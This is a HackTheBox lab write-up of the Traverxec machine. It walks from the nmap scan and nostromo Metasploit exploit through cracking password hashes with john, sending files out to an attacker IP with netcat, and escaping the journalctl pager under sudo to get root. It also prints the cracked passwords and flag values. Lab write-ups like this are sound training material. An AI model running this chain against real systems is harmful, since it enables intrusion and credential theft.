HackTheBox – Traverxec
Initial Enumeration
Let’s start by running a somewhat extensive nmap scan.
$ nmap -sCSV -p 1-20000 10.10.10.165
Starting Nmap 7.80 ( https://nmap.org ) at 2019-12-30 21:19 AEDT
Nmap scan report for 10.10.10.165
Host is up (0.054s latency).
Not shown: 19998 filtered ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u1 (protocol 2.0)
| ssh-hostkey:
| 2048 aa:99:a8:16:68:cd:41:cc:f9:6c:84:01:c7:59:09:5c (RSA)
| 256 93:dd:1a:23:ee:d7:1f:08:6b:58:47:09:73:a3:88:cc (ECDSA)
|_ 256 9d:d6:62:1e:7a:fb:8f:56:92:e6:37:f1:10:db:9b:ce (ED25519)
80/tcp open http nostromo 1.9.6
|_http-server-header: nostromo 1.9.6
|_http-title: TRAVERXEC
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
So first thing we see is that port 80 is open. What is nostromo? Let’s do a quick check on searchsploit to see if we find anything.
$ searchsploit nostromo
---------------------------------------------------------------------------- ----------------------------------------
Exploit Title | Path
| (/usr/share/exploitdb/)
---------------------------------------------------------------------------- ----------------------------------------
Nostromo - Directory Traversal Remote Command Execution (Metasploit) | exploits/multiple/remote/47573.rb
---------------------------------------------------------------------------- ----------------------------------------
Very interesting. It appears that there is a RCE vulnerability in the nostromo framework. Let’s boot up msfconsole and see if we can get it to work.
Initial Foothold
Wow, the metasploit exploit actually worked. This doesn’t normally happen? I guess that’s our initial foothold in the bag.
www-data@traverxec:/var$ ls
ls
backups cache lib local lock log mail nostromo opt run spool tmp
www-data@traverxec:/var$
Getting User
Let’s do some initial enumeration. For some reason the upload command in metasploit isn’t working, and wget doesn’t work either, so let’s try netcat.
www-data@traverxec:/tmp$ nc 10.10.xx.xx 4444 > LinEnum.sh
$ nc -lv -p 4444 < LinEnum.sh
Cool, that worked. So let’s begin our initial enumeration on the server itself.
www-data@traverxec:/tmp$ sh LinEnum.sh
...
-e [-] htpasswd found - could contain passwords:
/var/nostromo/conf/.htpasswd
david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/
-e
...
A hash found in one of the nostromo .htpasswd files? Interesting, let’s crack it.
$ echo 'david:$1$e7NfNpNi$A6nCwOTqrNR2oDuIKirRZ/' > david.hash
$ john david.hash --wordlist=/usr/share/wordlists/rockyou.txt
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 256/256 AVX2 8x3])
Will run 12 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
Nowonly4me (david)
1g 0:00:00:24 DONE (2019-12-30 22:48) 0.04144g/s 438409p/s 438409c/s 438409C/s NuiMeanPoon..Norri83
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Nice, so now we have a password. We just need to find out what this password is for. A couple quick checks shows us that we can’t use it to SSH in as david, nor can we su - david
. It’s probably safe to assume that it’s used as http basic authentication.
Well, we didn’t get anything from trying that, so let’s dig around on the server some more. Maybe a good a idea to look into that nostromo folder.
After literally 2 seconds of digging around the configuration files, I found a file called “nhttpd.conf”, so let’s take a look at the contents.
# MAIN [MANDATORY]
servername traverxec.htb
serverlisten *
serveradmin david@traverxec.htb
serverroot /var/nostromo
servermimes conf/mimes
docroot /var/nostromo/htdocs
docindex index.html
# LOGS [OPTIONAL]
logpid logs/nhttpd.pid
# SETUID [RECOMMENDED]
user www-data
# BASIC AUTHENTICATION [OPTIONAL]
htaccess .htaccess
htpasswd /var/nostromo/conf/.htpasswd
# ALIASES [OPTIONAL]
/icons /var/nostromo/icons
# HOMEDIRS [OPTIONAL]
homedirs /home
homedirs_public public_www
I have no idea what to make of this, so a quick Google search for the man page for nostromo’s configuration file is probably in order.
I found this. It appears that the home directory is exposed at http://traverxec.htb/~david/. Navigating to this page somewhat confirms this, though it’s not really publicly accessible. Likely due to the homedirs_public
option being set. Surely the permissions for this public_www
folder must be accessible? I wonder what happens when we try to navigate to it within the shell.
www-data@traverxec:/var/nostromo$ cd /home/david/public_www
cd /home/david/public_www
www-data@traverxec:/home/david/public_www$ ls
ls
index.html protected-file-area
www-data@traverxec:/home/david/public_www$
Huh, that actually worked? I wonder what’s in this protected-file-area
folder? Let’s find out.
www-data@traverxec:/home/david/public_www$ ls protected-file-area
ls protected-file-area
backup-ssh-identity-files.tgz
Aha! Backup SSH identity files. Let’s download these and try to use them. Metasploit’s download is being shitty again, so netcat it is.
$ nc -lv -p 4444 > backup-ssh-identity-files.tgz
www-data@traverxec:/home/david/public_www/protected-file-area$ nc 10.10.xx.xx 4444 < \
> backup-ssh-identity-files.tgz
Let’s SSH in.
$ ssh -i ssh_david david@10.10.10.165
Enter passphrase for key 'ssh_david':
Yup, that’s a password. Time to crack it.
$ /usr/share/john/ssh2john.py ssh_david > ssh_david.hash
$ john ssh_david --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (SSH [RSA/DSA/EC/OPENSSH (SSH private keys) 32/64])
Cost 1 (KDF/cipher [0=MD5/AES 1=MD5/3DES 2=Bcrypt/AES]) is 0 for all loaded hashes
Cost 2 (iteration count) is 1 for all loaded hashes
Will run 12 OpenMP threads
Note: This format may emit false positives, so it will keep trying even after
finding a possible candidate.
Press 'q' or Ctrl-C to abort, almost any other key for status
hunter (keys/ssh_david)
1g 0:00:00:01 DONE (2019-12-30 23:46) 0.5347g/s 7669Kp/s 7669Kc/s 7669KC/s 0125457423 ..\*7¡Vamos!
Session completed
Now let’s SSH in (again).
$ ssh -i keys/ssh_david david@10.10.10.165
Enter passphrase for key 'keys/ssh_david':
david@traverxec:~$
Nice. We have the user.txt flag.
david@traverxec:~$ cat user.txt
7db0b48469606a42cec20750d9782f3d
Getting Root
Digging around david’s home directory we find an interesting file.
david@traverxec:~/bin$ cat server-stats.sh
#!/bin/bash
cat /home/david/bin/server-stats.head
echo "Load: `/usr/bin/uptime`"
echo " "
echo "Open nhttpd sockets: `/usr/bin/ss -H sport = 80 | /usr/bin/wc -l`"
echo "Files in the docroot: `/usr/bin/find /var/nostromo/htdocs/ | /usr/bin/wc -l`"
echo " "
echo "Last 5 journal log lines:"
/usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service | /usr/bin/cat
The last line here is particularly interesting. For those that don’t know, when journalctl is invoked, if the size of the terminal window isn’t large enough, journalctl will open a program called less
which when run as sudo (like in this file).
So what we can probably gather from this, is that david is able to run the command /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
, even though we can’t see the results of sudo -l
, as we don’t know david’s password. A quick check confirms this theory.
david@traverxec:~/bin$ /usr/bin/sudo /usr/bin/journalctl -n5 -unostromo.service
-- Logs begin at Mon 2019-12-30 04:29:46 EST, end at Mon 2019-12-30 11:06:49 EST. --
Dec 30 09:57:59 traverxec sudo[2393]: pam_unix(sudo:auth): conversation failed
Dec 30 09:57:59 traverxec sudo[2393]: pam_unix(sudo:auth): auth could not identify password for [www-data]
Dec 30 09:57:59 traverxec sudo[2393]: www-data : command not allowed ; TTY=unknown ; PWD=/usr/bin ; USER=root ; COMMAND=list
Dec 30 09:58:41 traverxec sudo[2396]: pam_unix(sudo:auth): authentication failure; logname= uid=33 euid=0 tty=/dev/pts/4 ruser=www-data rhost= user=www-data
Dec 30 09:58:54 traverxec sudo[2396]: www-data : command not allowed ; TTY=pts/4 ; PWD=/usr/bin ; USER=root ; COMMAND=list
So let’s make our terminal window smaller and invoke this command. Allowing us to access less
as sudo and perform our privilege escalation.
root@traverxec:/# id
uid=0(root) gid=0(root) groups=0(root)
root@traverxec:/#
Nice. Time to get the flag.
root@traverxec:/# cat /root/root.txt
9aa36a6d76f785dfd320a478f6e0d906
root@traverxec:/#
Lessons Learned
- Digging around application configuration files can be very important.
- Reading the man pages for afformentioned config files is important too.
- You can make inferences about
sudo -l
even if you don’t have the user’s password. - Sometimes weird behaviour of tools can be used to your advantage.